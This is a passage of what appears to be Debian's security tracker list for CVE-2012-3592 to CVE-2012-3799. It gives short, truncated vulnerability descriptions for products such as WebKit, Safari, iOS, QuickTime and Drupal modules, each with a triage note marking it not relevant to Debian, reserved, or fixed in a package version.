	NOT-FOR-US: Drupal module
CVE-2012-3799 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Drupal module
CVE-2012-3798 (The Janrain Capture module 6.x-1.0 and 7.x-1.0 for Drupal, when ...)
	NOT-FOR-US: Drupal module
CVE-2012-3797 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...)
	NOT-FOR-US: Pro-face WinGP PC Runtime
CVE-2012-3796 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...)
	NOT-FOR-US: Pro-face WinGP PC Runtime
CVE-2012-3795 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...)
	NOT-FOR-US: Pro-face WinGP PC Runtime
CVE-2012-3794 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...)
	NOT-FOR-US: Pro-face WinGP PC Runtime
CVE-2012-3793 (Integer overflow in Pro-face WinGP PC Runtime 3.1.00 and earlier, and ...)
	NOT-FOR-US: Pro-face WinGP PC Runtime
CVE-2012-3792 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...)
	NOT-FOR-US: Pro-face WinGP PC Runtime
CVE-2012-3791 (Multiple SQL injection vulnerabilities in Simple Web Content ...)
	NOT-FOR-US: Simple Web Content Management System
CVE-2012-3790 (Cross-site scripting (XSS) vulnerability in index.php in Adiscon ...)
	NOT-FOR-US: Adiscon LogAnalyzer
CVE-2011-5095 (The Diffie-Hellman key-exchange implementation in OpenSSL 0.9.8, when ...)
	- openssl 0.9.8a-1 (bug #684527)
	NOTE: fips version not used in Debian
CVE-2012-3789 (Unspecified vulnerability in bitcoind and Bitcoin-Qt before 0.4.7rc3, ...)
	- bitcoin 0.5.0~rc1-1
CVE-2012-3788 RESERVED
CVE-2012-3787 RESERVED
CVE-2012-3786 RESERVED
CVE-2012-3785 RESERVED
CVE-2012-3784 RESERVED
CVE-2012-3783 RESERVED
CVE-2012-3782 RESERVED
CVE-2012-3781 RESERVED
CVE-2012-3780 RESERVED
CVE-2012-3779 RESERVED
CVE-2012-3778 RESERVED
CVE-2012-3777 RESERVED
CVE-2012-3776 RESERVED
CVE-2012-3775 RESERVED
CVE-2012-3774 RESERVED
CVE-2012-3773 RESERVED
CVE-2012-3772 RESERVED
CVE-2012-3771 RESERVED
CVE-2012-3770 RESERVED
CVE-2012-3769 RESERVED
CVE-2012-3768 RESERVED
CVE-2012-3767 RESERVED
CVE-2012-3766 RESERVED
CVE-2012-3765 RESERVED
CVE-2012-3764 RESERVED
CVE-2012-3763 RESERVED
CVE-2012-3762 RESERVED
CVE-2012-3761 RESERVED
CVE-2012-3760 RESERVED
CVE-2012-3759 RESERVED
CVE-2012-3758 (Buffer overflow in Apple QuickTime before 7.7.3 allows remote ...)
	NOT-FOR-US: QuickTime
CVE-2012-3757 (Apple QuickTime before 7.7.3 allows remote attackers to execute ...)
	NOT-FOR-US: QuickTime
CVE-2012-3756 (Buffer overflow in Apple QuickTime before 7.7.3 allows remote ...)
	NOT-FOR-US: QuickTime
CVE-2012-3755 (Buffer overflow in Apple QuickTime before 7.7.3 allows remote ...)
	NOT-FOR-US: QuickTime
CVE-2012-3754 (Use-after-free vulnerability in the Clear method in the ActiveX ...)
	NOT-FOR-US: QuickTime
CVE-2012-3753 (Buffer overflow in the plugin in Apple QuickTime before 7.7.3 allows ...)
	NOT-FOR-US: QuickTime
CVE-2012-3752 (Multiple buffer overflows in Apple QuickTime before 7.7.3 allow remote ...)
	NOT-FOR-US: QuickTime
CVE-2012-3751 (Use-after-free vulnerability in the plugin in Apple QuickTime before ...)
	NOT-FOR-US: QuickTime
CVE-2012-3750 (The Passcode Lock implementation in Apple iOS before 6.0.1 does not ...)
	NOT-FOR-US: iOS
CVE-2012-3749 (The extensions APIs in the kernel in Apple iOS before 6.0.1 provide ...)
	NOT-FOR-US: iOS
CVE-2012-3748 (Race condition in WebKit in Apple iOS before 6.0.1 and Safari before ...)
	NOT-FOR-US: WebKit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3747 (WebKit, as used in Apple iOS before 6, allows remote attackers to ...)
	NOT-FOR-US: WebKit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3746 (UIWebView in UIKit in Apple iOS before 6 does not properly use the ...)
	NOT-FOR-US: WebKit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3745 (Off-by-one error in Telephony in Apple iOS before 6 allows remote ...)
	NOT-FOR-US: Telephony in Apple iOS
CVE-2012-3744 (Telephony in Apple iOS before 6 uses an SMS message's return address ...)
	NOT-FOR-US: Telephony in Apple iOS
CVE-2012-3743 (The System Logs implementation in Apple iOS before 6 does not restrict ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3742 (Safari in Apple iOS before 6 does not properly restrict use of an ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3741 (The Restrictions (aka Parental Controls) implementation in Apple iOS ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3740 (The Passcode Lock implementation in Apple iOS before 6 does not ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3739 (The Passcode Lock implementation in Apple iOS before 6 allows ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3738 (The Emergency Dialer screen in the Passcode Lock implementation in ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3737 (The Passcode Lock implementation in Apple iOS before 6 does not ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3736 (The Passcode Lock implementation in Apple iOS before 6 allows ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3735 (The Passcode Lock implementation in Apple iOS before 6 does not ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3734 (Office Viewer in Apple iOS before 6 writes cleartext document data to ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3733 (Messages in Apple iOS before 6, when multiple iMessage e-mail ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3732 (Mail in Apple iOS before 6 uses an S/MIME message's From address as ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3731 (Mail in Apple iOS before 6 does not properly implement the Data ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3730 (Mail in Apple iOS before 6 does not properly handle reuse of ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3729 (The Berkeley Packet Filter (BPF) interpreter implementation in the ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3728 (The kernel in Apple iOS before 6 dereferences invalid pointers during ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3727 (Buffer overflow in the IPsec component in Apple iOS before 6 allows ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3726 (Double free vulnerability in ImageIO in Apple iOS before 6 allows ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3725 (The DNAv4 protocol implementation in the DHCP component in Apple iOS ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3724 (CFNetwork in Apple iOS before 6 does not properly identify the host ...)
	NOT-FOR-US: Apple iOS
CVE-2012-3723 (Apple Mac OS X before 10.7.5 does not properly handle the bNbrPorts ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-3722 (The Sorenson codec in QuickTime in Apple Mac OS X before 10.7.5, and ...)
	NOT-FOR-US: QuickTime in Apple Mac OS X
CVE-2012-3721 (Profile Manager in Apple Mac OS X before 10.7.5 does not properly ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-3720 (Mobile Accounts in Apple Mac OS X before 10.7.5 and 10.8.x before ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-3719 (Mail in Apple Mac OS X before 10.7.5 does not properly handle embedded ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-3718 (Apple Mac OS X before 10.7.5 and 10.8.x before 10.8.2 allows local ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-3717 RESERVED
CVE-2012-3716 (CoreText in Apple Mac OS X 10.7.x before 10.7.5 allows remote ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-3715 (Apple Safari before 6.0.1 makes http requests for https URIs in ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3714 (The Form Autofill feature in Apple Safari before 6.0.1 does not ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3713 (Apple Safari before 6.0.1 does not properly handle the Quarantine ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3712 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3711 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3710 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3709 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3708 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3707 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3706 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3705 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3704 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3703 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3702 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3701 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3700 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3699 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3698 (Apple Xcode before 4.4 does not properly compose a designated ...)
	NOT-FOR-US: Apple Xcode
CVE-2012-3697 (WebKit in Apple Safari before 6.0 does not properly handle file: URLs, ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3696 (CRLF injection vulnerability in WebKit in Apple Safari before 6.0 ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3695 (Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3694 (WebKit in Apple Safari before 6.0 does not properly handle ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3693 (Incomplete blacklist vulnerability in WebKit in Apple Safari before ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3692 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3691 (WebKit in Apple Safari before 6.0 does not properly handle Cascading ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3690 (WebKit in Apple Safari before 6.0 does not properly handle ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3689 (WebKit in Apple Safari before 6.0 does not properly handle ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3688 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3687 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3686 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3685 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3684 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3683 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3682 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3681 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3680 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3679 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3678 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3677 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3676 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3675 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3674 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3673 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3672 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3671 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3670 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3669 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3668 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3667 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3666 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3665 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3664 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3663 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3662 RESERVED
CVE-2012-3661 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3660 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3659 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3658 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3657 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3656 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3655 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3654 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3653 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3652 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3651 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3650 (WebKit in Apple Safari before 6.0 accesses uninitialized memory ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3649 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3648 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3647 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3646 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3645 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3644 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3643 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3642 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3641 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3640 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3639 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-3638 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3637 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3636 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3635 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3634 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3633 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3632 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3631 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3630 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3629 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) 
NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3628 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3627 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3626 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3625 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3624 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3623 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3622 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3621 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3620 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) 
NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3619 RESERVED CVE-2012-3618 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3617 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3616 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3615 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3614 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3613 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3612 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3611 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3610 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) 
NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3609 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3608 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3607 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3606 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3605 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3604 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3603 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3602 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3601 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) 
NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3600 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3599 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3598 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3597 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3596 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3595 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3594 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3593 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3592 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) 
